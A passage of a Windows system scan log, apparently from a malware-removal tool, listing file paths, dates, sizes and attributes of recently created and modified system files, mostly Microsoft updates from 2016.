2016-06-20 13:12 - 2016-02-08 20:37 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 20:35 - 00954880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 20:34 - 00667648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 20:33 - 00520192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 19:50 - 03120640 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 18:55 - 02592256 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll
2016-06-20 13:12 - 2016-02-08 18:33 - 01278464 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2016-06-20 13:12 - 2016-02-08 18:02 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 18:00 - 00599552 _____ (Microsoft Corporation) C:\Windows\system32\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 17:58 - 00336384 _____ (Microsoft Corporation) C:\Windows\system32\stobject.dll
2016-06-20 13:12 - 2016-02-08 17:55 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\SettingMonitor.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 02171904 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlowUI.dll
2016-06-20 13:12 - 2016-02-08 17:53 - 01348096 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 01220096 _____ (Microsoft Corporation) C:\Windows\system32\twinui.appcore.dll
2016-06-20 13:12 - 2016-02-08 17:50 - 00841728 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncCore.dll
2016-06-20 13:12 - 2016-02-08 17:48 - 00655872 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-06-20 13:12 - 2016-02-08 17:47 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2016-06-20 13:12 - 2016-02-08 17:44 - 00955392 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.dll
2016-06-20 13:12 - 2016-02-04 17:57 - 00018944 _____ (Microsoft Corporation) C:\Windows\system32\httpprxp.dll
2016-06-20 13:12 - 2016-02-04 17:49 - 00125440 _____ (Microsoft Corporation) C:\Windows\system32\httpprxm.dll
2016-06-20 13:12 - 2016-02-04 17:39 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\adhsvc.dll
2016-06-20 13:12 - 2015-03-13 02:11 - 02162176 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-06-20 13:12 - 2015-03-13 01:39 - 01812992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-06-20 13:09 - 2016-03-08 15:44 - 00138240 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-06-20 13:09 - 2016-02-03 16:11 - 01673728 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2016-06-20 13:09 - 2016-02-02 18:15 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2016-06-20 13:09 - 2016-01-07 00:46 - 00148752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscapi.dll
2016-06-20 13:09 - 2016-01-07 00:45 - 00177712 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2016-06-20 13:09 - 2016-01-06 17:47 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2016-06-20 13:09 - 2015-04-08 23:41 - 00158720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rgb9rast.dll
2016-06-20 13:09 - 2015-04-03 01:35 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-04-03 01:14 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhotoMetadataHandler.dll
2016-06-20 13:09 - 2015-03-13 03:02 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys
2016-06-20 13:08 - 2016-03-10 18:43 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-06-20 13:08 - 2016-03-10 17:55 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-06-20 13:08 - 2016-03-10 17:42 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-06-20 13:08 - 2016-01-26 20:15 - 00072024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpci.sys
2016-06-20 13:08 - 2016-01-26 15:48 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpcivsp.sys
2016-06-20 13:08 - 2016-01-20 23:40 - 00099672 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2016-06-20 13:08 - 2015-10-03 20:41 - 01385280 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-06-20 13:08 - 2015-10-03 20:41 - 01124384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-06-20 13:07 - 2016-03-10 18:03 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\dsparse.dll
2016-06-20 13:07 - 2016-03-10 17:48 - 00024064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dsparse.dll
2016-06-20 13:07 - 2016-01-22 06:22 - 02487296 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2016-06-20 13:07 - 2016-01-22 06:11 - 01482240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2016-06-20 13:07 - 2015-08-06 18:05 - 00669184 _____ (Microsoft Corporation) C:\Windows\system32\hhctrl.ocx
2016-06-20 13:07 - 2015-08-06 17:37 - 00536576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hhctrl.ocx
2016-06-20 13:07 - 2015-04-25 03:25 - 00020992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2016-06-20 13:07 - 2015-02-03 01:03 - 03551744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-02-03 01:02 - 04298240 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01488896 _____ (Microsoft Corporation) C:\Windows\system32\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 03:03 - 01464832 _____ (Microsoft Corporation) C:\Windows\system32\mfc42.dll
2016-06-20 13:07 - 2015-01-30 02:44 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42u.dll
2016-06-20 13:07 - 2015-01-30 02:42 - 01204224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc42.dll
2016-06-20 13:06 - 2016-03-05 18:44 - 00148480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shacct.dll
2016-06-20 13:06 - 2016-03-05 18:04 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2016-06-20 13:06 - 2016-02-04 19:07 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-04 18:35 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpsapi.dll
2016-06-20 13:06 - 2016-02-02 18:18 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2016-06-20 13:06 - 2016-01-10 17:41 - 01707008 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-06-20 13:06 - 2016-01-10 17:31 - 01344512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-06-20 13:06 - 2015-12-30 21:49 - 00470360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2016-06-20 13:06 - 2015-11-19 15:33 - 00994760 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2016-06-20 13:06 - 2015-11-19 15:26 - 00922432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:42 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2016-06-20 13:06 - 2015-08-22 14:35 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2016-06-20 13:06 - 2015-05-03 16:09 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-06-20 13:06 - 2015-05-03 15:58 - 00210944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-06-20 13:06 - 2015-05-03 15:55 - 00971776 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll
2016-06-20 13:06 - 2015-05-03 15:49 - 00811008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll
2016-06-20 13:06 - 2015-03-06 03:47 - 01696256 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2016-06-20 13:05 - 2016-04-14 16:25 - 02778624 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2016-06-20 13:05 - 2016-04-14 16:11 - 02464768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-06-20 13:05 - 2016-02-05 20:07 - 00378712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2016-06-20 13:05 - 2016-02-05 16:11 - 00845312 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-06-20 13:05 - 2016-02-05 16:11 - 00422400 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:07 - 00272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-06-20 13:05 - 2016-02-05 16:02 - 01083904 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-06-20 13:05 - 2016-02-04 17:23 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2016-06-20 13:05 - 2016-02-04 17:22 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2016-06-20 13:05 - 2016-01-31 20:17 - 00118624 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2016-06-20 13:05 - 2016-01-31 19:07 - 00110080 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2016-06-20 13:05 - 2016-01-31 18:42 - 03320832 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-06-20 13:05 - 2016-01-31 18:14 - 03607040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-06-20 13:05 - 2015-10-08 17:11 - 00060928 _____ (Microsoft Corporation) C:\Windows\system32\PCPKsp.dll
2016-06-20 13:05 - 2015-10-08 16:50 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPKsp.dll
2016-06-20 13:05 - 2015-01-28 03:24 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\StorageContextHandler.dll
2016-06-20 13:05 - 2015-01-28 02:47 - 00060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StorageContextHandler.dll
2016-06-20 13:04 - 2016-02-27 19:28 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-06-20 13:04 - 2016-02-27 18:57 - 03273728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 18:19 - 03820544 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2016-06-20 13:04 - 2016-02-27 17:32 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-06-20 13:04 - 2015-10-11 07:34 - 00468824 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-06-20 13:04 - 2015-10-11 07:34 - 00462168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00443224 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2016-06-20 13:04 - 2015-10-11 07:34 - 00027992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2016-06-20 13:04 - 2015-10-10 19:41 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys
2016-06-20 13:04 - 2015-07-09 17:14 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-06-20 13:04 - 2015-04-13 23:37 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\authz.dll
2016-06-20 13:04 - 2015-04-13 23:34 - 00180224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authz.dll
2016-06-20 13:04 - 2015-04-10 01:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-06-20 13:04 - 2015-04-10 01:17 - 01018880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00442712 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-06-20 13:03 - 2016-03-16 02:58 - 00332632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-06-20 13:03 - 2016-03-14 17:50 - 00316760 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2016-06-20 13:03 - 2016-03-10 17:52 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 01113944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-06-20 13:03 - 2015-07-14 22:59 - 00487256 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2016-06-20 13:03 - 2015-07-14 22:59 - 00393560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netcfgx.dll
2016-06-20 13:03 - 2015-05-11 17:34 - 00332800 _____ (Microsoft Corporation) C:\Windows\system32\fhcpl.dll
2016-06-20 13:03 - 2015-04-16 07:17 - 00325464 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\USBXHCI.SYS
2016-06-20 13:03 - 2015-03-13 05:03 - 00239424 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-06-20 13:03 - 2015-03-13 05:03 - 00154432 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-06-20 13:03 - 2015-01-30 03:02 - 00102912 _____ (Microsoft Corporation) C:\Windows\system32\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:40 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappgnui.dll
2016-06-20 13:03 - 2015-01-30 02:37 - 00331776 _____ (Microsoft Corporation) C:\Windows\system32\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00339456 _____ (Microsoft Corporation) C:\Windows\system32\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:24 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapp3hst.dll
2016-06-20 13:03 - 2015-01-30 02:16 - 00266752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eapphost.dll
2016-06-20 13:03 - 2015-01-30 02:08 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\eappcfg.dll
2016-06-20 13:03 - 2015-01-30 02:06 - 00278016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappcfg.dll
2016-06-20 13:02 - 2016-03-12 01:49 - 02466136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2016-06-20 13:02 - 2016-03-12 01:47 - 00160160 _____ (Microsoft Corporation) C:\Windows\system32\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-12 01:47 - 00121912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IPHLPAPI.DLL
2016-06-20 13:02 - 2016-03-10 17:55 - 00510976 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2016-06-20 13:02 - 2016-03-10 17:42 - 00413696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2016-06-20 13:02 - 2015-06-11 21:12 - 00428888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2016-06-20 13:02 - 2015-05-01 02:13 - 06521800 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2016-06-20 13:02 - 2015-05-01 02:13 - 01488000 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2016-06-20 13:02 - 2015-05-01 02:13 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll
2016-06-20 13:02 - 2015-04-01 05:21 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 05:18 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2016-06-20 13:02 - 2015-04-01 05:17 - 00248832 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2016-06-20 13:02 - 2015-04-01 05:08 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2016-06-20 13:02 - 2015-04-01 04:46 - 03633664 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 02551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2016-06-20 13:02 - 2015-04-01 04:17 - 00903168 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2016-06-20 13:02 - 2015-04-01 03:53 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2016-06-20 13:02 - 2015-04-01 03:53 - 00272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2016-06-20 13:02 - 2015-04-01 03:45 - 02749952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2016-06-20 13:02 - 2015-04-01 03:45 - 00699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2016-06-20 13:02 - 2015-04-01 03:14 - 01920000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2016-06-20 13:02 - 2015-04-01 03:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2016-06-20 13:02 - 2014-12-11 06:36 - 00046456 _____ (Microsoft Corporation) C:\Windows\system32\LockScreenContentServer.exe
2016-06-20 13:01 - 2015-12-20 15:56 - 00616960 _____ (Microsoft Corporation) C:\Windows\system32\msra.exe
2016-06-20 13:01 - 2015-10-05 19:28 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2016-06-20 13:01 - 2015-04-23 16:47 - 03084288 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2016-06-20 13:01 - 2015-04-23 16:16 - 02471424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2016-06-20 13:01 - 2015-03-06 04:08 - 02067968 _____ (Microsoft Corporation) C:\Windows\system32\wpdshext.dll
2016-06-20 13:01 - 2015-03-06 03:43 - 01969664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpdshext.dll
2016-06-20 13:01 - 2015-02-08 00:57 - 01090048 _____ (Microsoft Corporation) C:\Windows\system32\MrmCoreR.dll
2016-06-20 13:01 - 2015-02-08 00:49 - 00791040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MrmCoreR.dll
2016-06-20 13:00 - 2016-01-05 16:00 - 00570880 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2016-06-20 13:00 - 2015-07-16 19:58 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\NcdAutoSetup.dll
2016-06-20 13:00 - 2015-07-10 20:06 - 00118272 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthpan.sys
2016-06-20 13:00 - 2015-06-09 23:39 - 00081920 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2016-06-20 13:00 - 2015-06-09 23:39 - 00053248 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2016-06-20 13:00 - 2015-06-09 23:38 - 01201664 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2016-06-20 13:00 - 2015-05-12 14:19 - 00294912 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll
2016-06-16 20:21 - 2016-06-16 20:21 - 00000144 _____ C:\Windows\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-06-16 19:41 - 2016-06-16 19:41 - 00002325 _____ C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
2016-06-16 19:37 - 2016-06-16 19:37 - 00000451 _____ C:\Windows\system32\{F33C3B9B-72AF-418A-B3FD-560646F7CDA2}.bat
2016-06-16 19:36 - 2016-06-14 18:13 - 00828408 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-06-16 19:36 - 2016-06-14 18:13 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-06-16 19:01 - 2015-07-30 15:04 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2016-06-16 19:01 - 2015-07-30 14:48 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-06-16 18:30 - 2016-06-16 18:30 - 00000000 ____D C:\Users\User not found\AppData\Local\Macromedia
2016-06-16 17:45 - 2016-06-16 17:49 - 00000000 ____D C:\Windows\system32\MRT
2016-06-16 17:45 - 2016-06-16 17:45 - 142482544 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-07-16 14:19 - 2016-06-15 18:32 - 00000000 __SHD C:\Users\User not found\IntelGraphicsProfiles
2016-07-16 14:18 - 2013-08-22 15:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-07-16 13:42 - 2016-06-15 15:44 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2876588207-1483049806-666444280-1002
2016-07-16 13:36 - 2013-08-22 14:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-07-16 13:35 - 2013-08-22 16:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-07-16 13:35 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-07-16 13:34 - 2016-06-15 17:48 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-07-16 12:49 - 2016-06-15 18:34 - 00007750 _____ C:\Windows\system32\--traceoff
2016-07-16 12:47 - 2016-06-15 18:13 - 00000000 ____D C:\ProgramData\Adobe
2016-07-16 12:47 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Adobe
2016-07-15 14:47 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\NDF
2016-07-13 22:59 - 2015-03-15 07:21 - 00826448 _____ C:\Windows\system32\prfh0816.dat
2016-07-13 22:59 - 2015-03-15 07:21 - 00180490 _____ C:\Windows\system32\prfc0816.dat
2016-07-13 22:59 - 2014-11-21 08:38 - 01921692 _____ C:\Windows\system32\PerfStringBackup.INI
2016-07-13 22:59 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\Inf
2016-07-13 20:08 - 2013-08-22 16:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-07-13 19:30 - 2016-06-15 18:14 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Skype
2016-07-13 19:29 - 2016-06-15 18:14 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-07-13 19:29 - 2016-06-15 18:14 - 00000000 ____D C:\ProgramData\Skype
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2016-07-12 19:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Macromed
2016-07-11 18:20 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\rescache
2016-07-11 18:15 - 2016-06-15 16:46 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2016-07-11 18:15 - 2016-06-15 16:46 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-07-11 18:14 - 2016-06-15 16:48 - 00000000 ____D C:\ProgramData\NVIDIA
2016-07-11 18:14 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\Help
2016-07-08 14:45 - 2015-03-15 07:13 - 00000000 ____D C:\Windows\SysWOW64\XPSViewer
2016-07-08 14:45 - 2014-11-21 08:18 - 00000000 ____D C:\Program Files\Windows Journal
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\winrm
